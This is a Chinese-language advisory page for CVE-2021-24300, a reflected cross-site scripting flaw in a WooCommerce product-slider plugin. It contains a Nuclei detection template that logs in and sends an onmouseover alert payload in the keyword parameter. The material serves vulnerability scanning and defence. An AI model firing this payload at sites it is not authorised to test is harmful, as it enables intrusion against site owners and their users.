CVE-2021-24300: WordPress WooCommerce <1.13.22 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress WooCommerce | POC: 已公开

漏洞描述

WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter.

PoC代码[已公开]

id: CVE-2021-24300

info:
  name: WordPress WooCommerce <1.13.22 - Cross-Site Scripting
  author: cckuailong
  severity: medium
  description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update WordPress WooCommerce plugin to version 1.13.22 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24300
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24300
    cwe-id: CWE-79
    epss-score: 0.03405
    epss-percentile: 0.86974
    cpe: cpe:2.3:a:pickplugins:product_slider_for_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: pickplugins
    product: product_slider_for_woocommerce
    framework: wordpress
  tags: cve2021,cve,xss,wp,wordpress,wp-plugin,authenticated,wpscan,pickplugins

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="\"onmouseover=alert(document.domain);//">'
          - "PickPlugins Product Slider"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100aba47718b3ccc29c84b8e34eafa75c9abf088b59544d072182344815162fbd31022036fd23d8ba5b862cf9ee901150dfa8b183eb61f1d4066b9e050c1fd144bd6f88:922c64590222798bb761d5b6d8e72950

相关漏洞推荐